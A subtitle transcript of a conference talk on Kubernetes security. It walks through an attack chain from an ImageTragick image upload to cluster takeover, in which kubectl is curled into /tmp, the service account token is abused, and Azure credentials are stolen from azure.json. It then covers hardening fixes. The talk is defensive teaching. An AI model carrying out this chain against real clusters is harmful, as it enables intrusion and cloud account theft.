Thomas Fricke: Thank you very much for the
invitation. So second talk tomorrow –
Thank you – ähm today. So this is my
background. More or less I do, Kubernetes
security and critical infrastructure,
founded several companies and are now my
main focus is on Kubernetes security. This
this rabbit hole of Kubernetes, if you
look deeper into it, then you should be a
little bit scared, and I want to explain
why. The first approach is the
application, and then the application
normally is run in containers. And the
containers, what is not really well known,
have access to service accounts in
Kubernetes, which is one of the major
flaws in Kubernetes at the moment. If you
take over the service account, it might be
that you can take over a cluster. and if
you can take over a cluster, you might
take over a node and then your entire
cloud service account, Which is the work
of somebody else, I will mention later on
these slides. So let's look what happens:
So, the target is I have an application
exposed to the internet, and I want to own
the entire cluster from outside.
Application might be vulnerable. Examples?
Yeah, lots of them. One example I want to
present is imagetragick, who normally
should not do eval or exec statements in
any framework – should be PHP, NodeJS, or
any other framework – and execute commands
in the context of your application,
because something can go wrong and
developers are responsible for this. Let's
see how it looks like: This is the attack
model based on an attack. I thought it was
old and has been fixed in 2016, but now
there was a new overview by Emil Lerner,
who again showed, yes, you can, in current
versions of ImageMagick, exploit this
attack. So, it works. ImageMagick is for
uploading images, so you convert the image
in a different format, scale the size, and
then if you do something wrong in this
image, you can own the entire container.
This also works for non containerized
applications if you have a server running
something with ImageMagick on it. Please
be careful. OK. If we have mastered this
step, the next step is, yes, we want
access to the service account. And this is
by default enabled in Kubernetes: So, you
have a Kubernetes design flaw because your
service account is exposed to the
container where the application runs it.
The next step of an attacker is
installation of additional software. So,
you want to take over. You need a curl or
kubectl or chmod, and then you are owner
of the service account and can actually do
commands by uploading pictures in
ImageTragick. So responsible for this flaw
is the image creator. Let's see what else
can happen. To get total control, you also
need role-binding to a cluster-admin role.
This is not enabled by default, but the
internet is always good for bad advice. So
if you copy the installation requirements
or recommendations from the internet,
somebody else might take over the entire
cluster. Let's look deeper into it: Worst
practice here is what you can see in the
elastic installation recommendation: They
just mentioned they have a newer version,
but they use the cluster admin permissions
here to install ElasticSearch in your
Kubernetes cluster. So they recommend it
and a lot of other applications also have
this – which is a little bit outdated, but
it's quite common – in the installation
requirements. Never, ever do this, please.
It also can come with Helm Charts, so you
have Helm Charts where the cluster-admin
role is included. Here you see it, it was
in Apache Heron, which is an Apache
project, and it uses the cluster-admin
role, so by a helm install you might be
affected by this flaw to. So with these
four steps, which effectively are three
steps, you have a cluster application
exposed, and through that path, you can
take over the entire cluster from the
outside, and do anything what the cluster-
admin world can do. Effectively, is this
cluster-admin role-binding is like a
doormat attack, so you have the best
cryptography, the most expensive locks on
one side and then you put the lock under
the doormat or under the flower at the
door or something like that. This is
something which is, not really, what you
want. I can do an example walkthrough
which shows how it goes. So, I've
published all my trainings notebooks on
GitHub. Here's the way you can build this
out-dated ImageTragick version in
OpenShift. So, I use CRC, which is the
code-ready container version. It's based
on the ImageTragick proof of concept by
Mike Williams. And here you run and create
a vulnerable image. A little bit lengthy.
It's compiled inside and so on. So, don't
get a full Version. Which is the reason
why I don't show it here, but effectively
at the end, you have a vulnerable
application in a container internal and in
OpenShift. And that's exactly what we need
to run the application. Here is the
exploit. And the exploit starts with the
deployment of this container, which is
standard Kubernetes. Here "oc" is like
kubesctl. So, you get an overview.
Additionally, in OpenShift, you have a
very simple version of creating a root,
which is connected to a hostname, and then
you can upload it by using that hostname.
You expose the deployment, you expose the
service which is created, you expose the
route finally, and then you have access.
The next step is you get this root and
then here you have a URL, which you can
use. And in a full demo, I would just
simply call this URL and then I can upload
images here. I've created these files,
which are valid postscript files, but you
see at the end there is a full command.
And here, because there's a curl in the
container, I can download a version of
kubectl. Effectively, the containers,
specially the RedHat containers are not so
vulnerable as others, but you have always
writable temp, which is enough to deploy
some software. So, we curl kubectl from
the internet, put it into temp, and then
we use a simple chmod command to activate
kubectl. So now we can call kubectl
commands from inside an image. It's a
death bells, more or less so. Exactly at
the right place. We have a working exploit
now and warning, it might also already
work in older versions of Kubernetes.
Because in newer versions will need some.
Pill of poison, additionally, and this is
exactly this cluster all binding to the
cluster admin, which needs to be done,
that we have full access from the outside
and if we do this, and expose our cluster
admin account to the same account, which
is already exposed inside the container,
we can execute commands with this kubectl
so we can create deployments by uploading
pictures. Which is exactly what you never
want, but an attacker now has full access
to your cluster by simply uploading
prepared malicious pictures. Can do this.
So this is an example here, just. Create
and delete. Containers and deployments
this way, you can effectively do
everything. And again, this is the problem
here from the application side. If you
have a vulnerable version of ImageMagick,
you can include commands, and you can
definitely install software on the
Kubernetes server side. There are several
trys to fix this. For example, you can use
better images like Red Hat does, so this
is a Red Hat health index, which is quite
good, but effectively these images have
the advantage only that you not run
anything as root. But you run the same as
another user I.D. and it's the same user
is allowed to write to the temp directory,
effectively, yeah, you don't need root for
installing software. So, the container
also was good practice, no root inside, it
has an immutable root file system, but the
curl which is completely unnecessary, was
also deployed, we had write access to
temp. We had a chmod. And the first thing
you would prevent. All the stuff I'm doing
here is and if you're going to and don't
learn anything from this talk, please go.
Look into your service account and try to
disable the automountServiceAccountToken
features, so all of the service accounts
which are not running operators don't need
this service account open. If you have an
operator, it might be broken now and it
can be, um, overwritten by the Pod
definition, but effectively this. entire
example would not work without this
service account token. So, we have fixed
that. We cannot fix the application
because this is something, uh, somebody
else is creating for us, and we might even
have a floor which is not affected, so
there might be a zero-day. The next thing
we must prevent is the installation of
software. Fix the images, so use really
immutable images. Temp only if you need
it. PID is 1, anyway. Uh, OK, you might
have some variable data, but you should
use containers from scratch, no curl, no
wget and this also affects Red Hat UBIs
And most of the standard images have this
flaw, so you have a full operating system
inside with all the tools you like. But
this is not your territory. It's just,
yeah, it's a tool for the attacker. So
please run only trusted images, build your
own images and build them from scratch.
This is my example I also have uploaded to
GitHub, how to harden the container, which
is based on nginx alpine. nginx alpine
normally is a very small container, but
you can do more. You can use the script,
which is in this repository, just to get
only the tools you need. So this is not
statically linked because the original
engine is not statically linked. But it's
very close. This means you only positively
install the software you need. This is
dynamically linked, therefor the -d, so we
use LVD. Extract all the dynamic link
libraries and then all the configuration
files which are necessary. It is the
password registry group. OK. Some licenses
and share. Need some directories for
logging and then you can install it from
scratch because this script installs it in
a directory \temp\harden and you can with
this. Multi-stage build you can install
all what you need from \temp\harden. And
then the next container is based on
scratch and you can use nginx the same way
you would use it more or less. An
application which is statically linked. So
now we have created a hardened image
without kubectl, curl inside. So, we are
much closer to a secure application. The
next thing is, yeah, role binding to
cluster admin role. Don't do this. If
something in your application goes wrong,
you have additional measures, which you
can take just to prevent the application
from break-out of the container. So, you
can separate the internet exposure of
services or ingresses in Kubernetes from
privilege operations. So you have node
settings. ElasticSearch is doing a lot of
these things, so a lot is really not true
so, doing a sysctl. Some applications have
hostPaths on or have connection to the
host inter-process communication, which is
not necessary if you have exposed it and
then separate the applications who need
this from the applications which don't
need it. So, cluster admin should be more
or less restricted to very privileged
operators. And by the way, Argo is also a
very privileged operator. Don't run an
Argo on a Kubernetes cluster in a security
critical environment because I've seen
Argo also is binding to cluster admin. It
doesn't mean that Argo by default is
unsafe, but it's a very complex
application and I would definitely run it
in a separate cluster, not in the critical
cluster. And what does an architecture fix
look like, here you have the lifecycle of
a Pod, so the time is going to from left
to right. Here you see if the container is
ready, it can be accessed from the
internet. And if you do something from the
init system, like a sysctl, please do it
inside a container which is not connected
to the internet, just to use the pause
container, as a pause container to limit
it and restrict it and that is not really
connected to the network. So, this is
something which covers the architecture.
Additionally, I already mentioned here the
network policy which will come later, so
this is our threat matrix. We have exposed
and not exposed services. You have
unprivileged and privileged things. The
dangerous ones are the privileged ones
which are exposed, but normally you only
have an exposed privileged application if
you have an IDE running in Kubernetes,
which is not what I would like to see in
critical infrastructure, something like
rstudio or have a web ui to a gitops
framework. And normally you only have a
web application. And what should not be
exposed under normal conditions is an
operator's sysctl, build systems, host
operators and so on. If you do this, it's
virtually not possible to own the cluster,
you should do all the three because if you
have security in depth, you can make a
mistake on one of these levels and the
other means other levels keep you from
being exploited. You can even do more
isolation on the network side, you have
network policies for egress on the node
side, you can activate seccomp, gvisor,
and the common Frameworks, SELinux,
Apparmor. You can use PodSecurity
policies, or in the future, the open
policy agent to prevent the node from
being hacked. For the identity and access
management, you should use individual
service accounts for all your tasks. So
you have enough of a lot of roles. You
should use role based access control to
check this. OK, but I promise, yes, we can
go even deeper, and this needs a little
help from your cloud administrator and
here, the example from Nico Meisenzahl,
who does a very similar example on hi-
jacking Kubernetes, and he's doing it,
obviously in one of the clouds. And what
he has found out is you can get access to
the azure.json file, which has user
assigned identities. This is not the
Kubernetes identities. This is the Azure
identity. You can get a token, you can get
a subscription, you can get a resource
group and then you can use a curl command,
with this token, to change things on the
API version of this resource group with
this subscription. So, you might be able
to hack your node with the privilege
container and then take over your cloud
account. And he told me that this is also
the truth for the other cloud, so it might
even work something similar in AWS and
GCP. So please, also protect your cloud
account. Understand your identity and
access management in the cloud. So, at
least, someone in the team should
understand it. And limit also the
underlying account to the bare minimum. It
might even be a good idea to block access
addresses like 169.254.something. And the
other clouds, as I already mentioned, also
might be affected. And my call to the
cloud providers, is don't deliver account
data in containers or nodes. This is not
necessary. It's yes, it's very
comfortable, as the service account
talking is very comfortable for running
operators, but it's a major security flaw
and it might be that you lose all your
accounts and data. Conclusion: We have a
full attach chain from the application to
the cloud account. And it's your task to
prevent it and fix it. This is called
shared responsibility, so the cloud
providers effectively only care for the
infrastructure, but not really for the
security in your clou d. This is your
task. OK. Thank you for your attention, I
hope it was interesting. Please ask your
questions. And now I'm open for he Q&A.
Applaus
Herald: Thank you for the talk. This is
working? Yeah. So do we have any questions
from the internet? I don't see any coming
in so far, but we, I think, usually a bit
ahead so I'll ask one:
Q: What do you think? So who's in in the
responsibility mainly to fix these
insecurities? Do you think this can be
fixed by better default in these
infrastructures and configuration files?
Is this to be fixed for better tutorials
and better education for the devop
engineers? What was the main point of
responsibility?
A: I definitely would prefer to have
secure default installations. But then you
have this shared responsibility in the
contracts: From a certain point, you are
responsible for the security of the
account, and we have seen this complexity
because this might be 20 steps. Every step
is very simple and every step is looking
very harmless, but all the steps together
might create a full exploit of a cloud. So
this must be overseen, and it's very hard
for developers who are cloud native and
are focusing on the application to have an
overview of the security. Developers now
have 10 or 100 times more code on the hard
disk than ten years before. And this means
developers are not able really to have a
full judgment about what is going on in
terms of security. This is something
developers talk about security, either
they are specialized on it or they have
not seen things like this. What I normally
notice: The developers are not aware of
these problems.
Q: OK. And what do you think, what can we
do about the complexity? So do you think
we need better education for people to
actually understand the systems? Or is
there a way in cloud infrastructures to
reduce the complexity?
A: Better education? And do all the simple
fixes. These are five steps, and the fixes
are also very simple. And you have to
check them and then you need a tool
because you might have 20 clusters like
this. Every cluster has 20 applications,
so this might be quite complicated. So you
need tools for an overview and in the
trainings material, you see examples how
you can check your Kubernetes clusters for
exploits like this.
Herald: OK, thank you very much. Thanks
for being here. We will continue in about
half an hour with the next talk, then
again in German. Thanks.
Thomas: Thank you very much. Applaus
Outro: Everything is licensed under CC BY
4.0. And it is all for the community, to
the unknown and for everyone.
Subtitles created by c3subtitles.de
in the year 2022. Join, and help us!